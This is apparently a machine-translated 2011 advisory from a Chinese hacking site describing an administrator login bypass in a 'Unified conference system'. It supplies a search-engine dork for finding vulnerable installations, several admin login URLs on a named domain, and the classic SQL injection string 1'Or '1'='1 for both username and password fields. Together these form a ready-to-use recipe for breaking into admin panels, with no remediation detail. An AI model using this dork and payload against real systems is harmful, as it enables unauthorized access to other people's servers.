Unified conference system universal password vulnerability-vulnerability warning-the black bar safety net

2011-05-07T00:00:00
ID MYHACK58:62201130370
Type myhack58
Reporter 佚名
Modified 2011-05-07T00:00:00

Description

Vulnerability description: the Unified conference system(the Unified Council Systems)there is a serious administrator authentication bypass vulnerability, if not fix the vulnerability, an attacker using a simple or=or you can break through the background verification of the limit, the consequences are quite serious.

Vulnerability type: sql injection, the Universal password, the background bypass vulnerability......

Google keywords: intext:"Unified Council. All rights reserved."

Vulnerability test:

[+]http://www.cnc.net/login.aspx

[+]http://www.cnc.net/Path/Login.aspx

[+]http://www.cnc.net/Path/login.aspx

[+]Username : 1'Or '1'='1

[+]Password : 1'Or '1'='1